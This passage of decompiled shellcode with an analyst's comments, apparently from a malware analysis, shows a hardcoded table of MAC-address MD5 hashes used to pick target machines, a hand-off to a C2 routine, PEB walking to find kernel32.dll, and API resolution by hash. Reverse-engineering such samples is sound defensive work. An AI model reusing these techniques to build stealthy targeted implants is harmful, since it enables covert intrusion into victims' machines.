= 0; md5s_of_macs[8].md5mac2[0] = 0x7c341f2; md5s_of_macs[8].md5mac2[1] = 0x7477573a; md5s_of_macs[8].md5mac2[2] = 0x7214342c; md5s_of_macs[8].md5mac2[3] = 0xec3ed4e2; md5s_of_macs[8].padding2 = 0; md5s_of_macs[9].count = 1; md5s_of_macs[9].md5mac1[0] = 0x4a56c24e; md5s_of_macs[9].md5mac1[1] = 0xc52d98ce; md5s_of_macs[9].md5mac1[2] = 0xbf39108c; md5s_of_macs[9].md5mac1[3] = 
0x3ca86e6d; md5s_of_macs[9].padding1 = 0; md5s_of_macs[9].md5mac2[0]._0_1_ = 0; md5s_of_macs[9].md5mac2._1_4_ = 0; md5s_of_macs[9].md5mac2._5_4_ = 0; md5s_of_macs[9].md5mac2._9_4_ = 0; md5s_of_macs[9]._37_4_ = 0; md5s_of_macs[9].padding2._1_2_ = 0; md5s_of_macs[9].padding2[3] = 0; md5s_of_macs[10].count = 2; md5s_of_macs[10].md5mac1[0] = 0x9eef0cab; md5s_of_macs[10].md5mac1[1] = 0x9e125759; md5s_of_macs[10].md5mac1[2] = 0x78a1fb23; md5s_of_macs[10].md5mac1[3] = 0xba20f12; md5s_of_macs[10].padding1 = 0; md5s_of_macs[10].md5mac2[0]._0_2_ = 0x58f7; md5s_of_macs[10].md5mac2._3_4_ = 0x7740734e; md5s_of_macs[10].md5mac2._7_4_ = 0xe93205c7; md5s_of_macs[10].md5mac2[3]._0_2_ = 0xc551; md5s_of_macs[10].md5mac2[3]._2_1_ = 0xdf; md5s_of_macs[10].padding2 = 0; md5s_of_macs[11].count = 1; md5s_of_macs[11].md5mac1[0] = 0x61605af3; md5s_of_macs[11].md5mac1[1] = 0xde36b37a; md5s_of_macs[11].md5mac1[2] = 0x99c7aa4d; md5s_of_macs[11].md5mac1[3] = 0xb6076d67; md5s_of_macs[11].padding1 = 0; md5s_of_macs[11].md5mac2[0]._0_1_ = 0; md5s_of_macs[11].md5mac2._1_4_ = 0; md5s_of_macs[11].md5mac2._5_4_ = 0; md5s_of_macs[11].md5mac2._9_4_ = 0; md5s_of_macs[11]._37_4_ = 0; md5s_of_macs[11].padding2._1_2_ = 0; md5s_of_macs[11].padding2[3] = 0; md5s_of_macs[12].count = 1; md5s_of_macs[12].md5mac1[0] = 0xd8ea626a; md5s_of_macs[12].md5mac1[1]._0_1_ = 1; md5s_of_macs[12].md5mac1._5_4_ = 0x9e5c2a80; md5s_of_macs[12].md5mac1._9_4_ = 0xc1d028c8; md5s_of_macs[12].md5mac1[3]._1_2_ = 0xbbed; md5s_of_macs[12].md5mac1[3]._3_1_ = 0x5b; md5s_of_macs[12].padding1 = 0; md5s_of_macs[12].md5mac2[0]._0_1_ = 0; md5s_of_macs[12].md5mac2._1_4_ = 0; md5s_of_macs[12].md5mac2._5_4_ = 0; md5s_of_macs[12].md5mac2._9_4_ = 0; md5s_of_macs[12]._37_4_ = 0; md5s_of_macs[12].padding2._1_2_ = 0; md5s_of_macs[12].padding2[3] = 0; md5s_of_macs[13].count = 1; md5s_of_macs[13].md5mac1[0] = 0x527b0c60; md5s_of_macs[13].md5mac1[1] = 0x3208f8e7; md5s_of_macs[13].md5mac1[2] = 0x4fe8cee3; md5s_of_macs[13].md5mac1[3] = 0x9d8bc8ce; 
md5s_of_macs[13].padding1 = 0; md5s_of_macs[13].md5mac2[0]._0_1_ = 0; md5s_of_macs[13].md5mac2._1_4_ = 0; md5s_of_macs[13].md5mac2._5_4_ = 0; md5s_of_macs[13].md5mac2._9_4_ = 0; md5s_of_macs[13]._37_4_ = 0; md5s_of_macs[13].padding2._1_2_ = 0; md5s_of_macs[13].padding2[3] = 0; md5s_of_macs[14].count = 2; md5s_of_macs[14].md5mac1[0] = 0xd7b2756e; md5s_of_macs[14].md5mac1[1] = 0x64980e47; md5s_of_macs[14].md5mac1[2] = 0xcb489ed1; md5s_of_macs[14].md5mac1[3] = 0x64af0c36; md5s_of_macs[14].padding1 = 0; md5s_of_macs[14].md5mac2[0] = 0xcd9b55fb; md5s_of_macs[14].md5mac2[1] = 0xfce03e10; md5s_of_macs[14].md5mac2[2] = 0x6141cfb0; md5s_of_macs[14].md5mac2[3] = 0x19fbfab0; md5s_of_macs[14].padding2 = 0; md5s_of_macs[15].count = 1; md5s_of_macs[15].md5mac1[0] = 0x1ed60a69; md5s_of_macs[15].md5mac1[1] = 0x99a85c7; md5s_of_macs[15].md5mac1[2] = 0x666b2164; md5s_of_macs[15].md5mac1[3] = 0x1a3bd3b5; md5s_of_macs[15].padding1 = 0; md5s_of_macs[15].md5mac2[0]._0_1_ = 0; md5s_of_macs[15].md5mac2._1_4_ = 0; md5s_of_macs[15].md5mac2._5_4_ = 0; md5s_of_macs[15].md5mac2._9_4_ = 0; md5s_of_macs[15]._37_4_ = 0; md5s_of_macs[15].padding2._1_2_ = 0; md5s_of_macs[15].padding2[3] = 0; md5s_of_macs[16].count = 2; md5s_of_macs[16].md5mac1[0] = 0xf39dda09; md5s_of_macs[16].md5mac1[1] = 0xadaf50a0; md5s_of_macs[16].md5mac1[2] = 0x96eff00d; md5s_of_macs[16].md5mac1[3] = 0xe2b6413b; md5s_of_macs[16].padding1 = 0; md5s_of_macs[16].md5mac2[0] = 0x6ab0e3fa; md5s_of_macs[16].md5mac2[1] = 0xf2b7fb2; md5s_of_macs[16].md5mac2[2] = 0x7fbf297c; md5s_of_macs[16].md5mac2[3] = 0x3ff8032b; md5s_of_macs[16].padding2 = 0; md5s_of_macs[17].count = 1; md5s_of_macs[17].md5mac1[0] = 0x6758b9d4; md5s_of_macs[17].md5mac1[1] = 0x5dbf471f; md5s_of_macs[17].md5mac1[2] = 0x5d7008cd; md5s_of_macs[17].md5mac1[3] = 0x539ade80; md5s_of_macs[17].padding1 = 0; md5s_of_macs[17].md5mac2[0]._0_1_ = 0; md5s_of_macs[17].md5mac2._1_4_ = 0; md5s_of_macs[17].md5mac2._5_4_ = 0; md5s_of_macs[17].md5mac2._9_4_ = 0; md5s_of_macs[17]._37_4_ 
= 0; md5s_of_macs[17].padding2._1_2_ = 0; md5s_of_macs[17].padding2[3] = 0; md5s_of_macs[8].md5mac1[3]._1_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; md5s_of_macs[10].md5mac2[0]._2_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; md5s_of_macs[10].md5mac2[2]._3_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; md5s_of_macs[10].md5mac2[3]._3_1_ = (undefined)md5s_of_macs[4].md5mac2[2]; mac_cnt = md5_mac(NULL,1,func_ptrs); if (mac_cnt != 0) { dwSize = (mac_cnt + 5) * 0x14; buffer = (*func_ptrs->VirtualAlloc)(NULL,dwSize,0x3000,4); (*func_ptrs->memset)(buffer,0,dwSize); mac_cnt2 = md5_mac(buffer,0,func_ptrs); if (mac_cnt2 != 0) { (*func_ptrs->memset)(&md5s_of_thismachine,0,0x2c); matched = cmp_md5(func_ptrs,(int *)md5s_of_macs,buffer,mac_cnt2,&md5s_of_thismachine); if (matched == 0) { no_match(func_ptrs,0,mac_cnt2); } else { C2(&md5s_of_thismachine,func_ptrs); } } } return; } // WARNING: Unknown calling convention yet parameter storage is locked // SHELLCODE ENTRY FUNCTION this will: // 1. Get kernel32.dll // 2. resolve imports // 3. execute payload int entry(void) { IMAGE_DOS_HEADER *dllbase; int GetProcAddress; int import_resolution_success; _LDR_DATA_TABLE_ENTRY_0x10 *ldr_entry; NT_TIB *local_FS_OFFSET__1; bool bVar1; LDR_DATA_TABLE_ENTRY *local_64; int func_ptr_table [21]; void *kernel32_dllbase; _LIST_ENTRY *flink; wchar_t *dll_name; _LDR_DATA_TABLE_ENTRY_0x10 *next_entry; // 1. get kernel32.dll // 1.1. iterate over InInitializationOrderModuleList // 1.2. match 1th, 6th and 9th character of module with `k`, `l`, `.` ... this matches // `kernel32.dll` flink = (local_FS_OFFSET__1->Self->ProcessEnvironmentBlock->Ldr->InInitializationOrderModuleList). 
Flink; ldr_entry = (_LDR_DATA_TABLE_ENTRY_0x10 *)flink->Flink; if ((_LDR_DATA_TABLE_ENTRY_0x10 *)flink->Flink != (_LDR_DATA_TABLE_ENTRY_0x10 *)flink) { while (local_64 = (LDR_DATA_TABLE_ENTRY *) ((int)&(ldr_entry->MappingInfoIndexNode).unlabelled0 + 4), (ldr_entry->BaseDllName).Length != 0) { // match the name of the module by comparing the 1st, 6th and 9th characters. This matches // kernel32.dll dll_name = (ldr_entry->BaseDllName).Buffer; if (((((*dll_name == L'k') || (*dll_name == L'K')) && ((dll_name[5] == L'l' || (dll_name[5] == L'L')))) && (dll_name[8] == L'.')) || (next_entry = (_LDR_DATA_TABLE_ENTRY_0x10 *)(ldr_entry->InInitializationOrderLinks).Flink, bVar1 = next_entry == ldr_entry, ldr_entry = next_entry, bVar1)) break; } } // get the dll base (in this case of the matched kernel32.dll) dllbase = (IMAGE_DOS_HEADER *)local_64->DllBase; // resolve LoadLibraryExW via the hash 431a42c9 and store in func_ptr_table[0] // also resolve c2cbc15a = GetProcAddress if (((dllbase != NULL) && (func_ptr_table[0] = getAddrByHash(dllbase,0x431a42c9), (LoadLibraryExW *)func_ptr_table[0] != NULL)) && (GetProcAddress = getAddrByHash(dllbase,0xc2cbc15a), GetProcAddress != 0)) { // resolve the imports import_resolution_success = import_resolution((func_ptr_table_t *)func_ptr_table); if (import_resolution_success == 0) { return 0; } // execute the payload // payload((func_ptr_table_t *)func_ptr_table); } return 1; }